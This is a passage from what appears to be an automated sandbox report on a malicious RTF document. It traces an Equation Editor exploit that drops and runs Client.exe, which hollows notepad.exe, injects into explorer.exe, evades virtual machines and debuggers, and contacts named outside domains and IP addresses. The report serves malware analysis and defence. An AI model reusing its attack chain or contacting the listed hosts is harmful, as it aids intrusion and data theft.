          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA1930 NtSetContextThread, 9_2_00AA1930
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FAB8 NtQueryValueKey, 9_2_00A9FAB8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FA20 NtQueryInformationFile, 9_2_00A9FA20
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FA50 NtEnumerateValueKey, 9_2_00A9FA50
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FBE8 NtQueryVirtualMemory, 9_2_00A9FBE8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FB50 NtCreateKey, 9_2_00A9FB50
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC30 NtOpenProcess, 9_2_00A9FC30
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC48 NtSetInformationFile, 9_2_00A9FC48
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0C40 NtGetContextThread, 9_2_00AA0C40
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA1D80 NtSuspendThread, 9_2_00AA1D80
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FD5C NtEnumerateKey, 9_2_00A9FD5C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FE24 NtWriteVirtualMemory, 9_2_00A9FE24
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FFFC NtCreateProcessEx, 9_2_00A9FFFC
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FF34 NtQueueApcThread, 9_2_00A9FF34
          Source: Client.exe.0.dr | Static PE information: Section: 5++.8$ ZLIB complexity 1.0003371646578538
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
          Source: classification engine | Classification label: mal100.troj.expl.evad.winRTF@11/9@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .VBPud<_
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | Virustotal: Detection: 43%
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | ReversingLabs: Detection: 21%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.n.o.t.e.p.a.d...e.x.e...........................B.........0.......0.....
          Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P1P.......4.t...........0.......................&.................0.....
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5B39.tmp
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | Static file information: File size 2870044 > 1048576
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00A286CE push es; ret 6_2_00A286E3
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00A24403 push esi; ret 6_2_00A24432
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003290F2 pushfd ; ret 6_2_00329171
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003290DA push esp; ret 6_2_003290F1
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00328F38 push eax; retn 002Dh 6_2_00328F39
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003606AF push 036C4A39h; ret 6_2_003606B9
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004AA4B6 push esi; iretd 6_2_004AA4B7
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004AA8B5 push edi; retf 6_2_004AA8B6
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004D7CC7 push ecx; ret 6_2_004D7CCC
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004D7112 push es; iretd 6_2_004D7117
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00873EBF push ebx; retf 6_2_00873EC0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00873ABB push edi; iretd 6_2_00873ABC
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_008746BB push edx; ret 6_2_008746C1
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0087051F push es; iretd 6_2_00870533
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02407248 push 00000003h; ret 6_2_0240725D
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02401E4D push 00000003h; ret 6_2_02401E57
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02404E5A push 00000003h; ret 6_2_02404E71
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02403E63 push 00000003h; ret 6_2_02403E79
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02402671 push 00000003h; ret 6_2_0240267B
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02402E71 push 00000003h; ret 6_2_02402E74
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02406671 push 00000003h; ret 6_2_0240668E
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02404672 push 00000003h; ret 6_2_0240467C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0240261D push 00000003h; ret 6_2_02402627
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02406220 push 00000003h; ret 6_2_0240623C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02400A22 push 00000003h; ret 6_2_02400A25
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02403E22 push 00000003h; ret 6_2_02403E25
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02406A32 push 00000003h; ret 6_2_02406A36
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02403633 push 00000003h; ret 6_2_02403636
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02405E3B push 00000003h; ret 6_2_02405E3E
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_024032E4 push 00000003h; ret 6_2_024032E7
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02405AEF push 00000003h; ret 6_2_02405B20
          Source: Client.exe.0.dr | Static PE information: section name: 5++.8$
          Source: Client.exe.0.dr | Static PE information: section name: (nameless section)
          Source: initial sample | Static PE information: section name: 5++.8$ entropy: 7.999437666681734

          Persistence and Installation Behavior

          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\notepad.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\notepad.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 772 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2524 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000d-dv
          Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027538105.000000000037B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.1007549733.0000000004423000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB26F8 mov eax, dword ptr fs:[00000030h] 9_2_00AB26F8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\notepad.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004D33F8 LdrLoadDll, 6_2_004D33F8
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Domain query: www.best-boy.net
          Source: C:\Windows\explorer.exe | Network Connect: 104.167.67.175 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.170 80
          Source: C:\Windows\explorer.exe | Domain query: www.thegoldencamel.online
          Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Thread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000
          Source: C:\Windows\SysWOW64\notepad.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 370000
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 401000
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 80000
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 77A7975D
          Source: C:\Windows\SysWOW64\notepad.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\notepad.exe | Thread register set: target process: 1860
          Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          Credential API Hooking
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium4
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts43
          Exploitation for Client Execution
          Boot or Logon Initialization Scripts812
          Process Injection
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory113
          System Information Discovery
          Remote Desktop Protocol1
          Credential API Hooking
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Command and Scripting Interpreter
          Logon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information
          Security Account Manager221
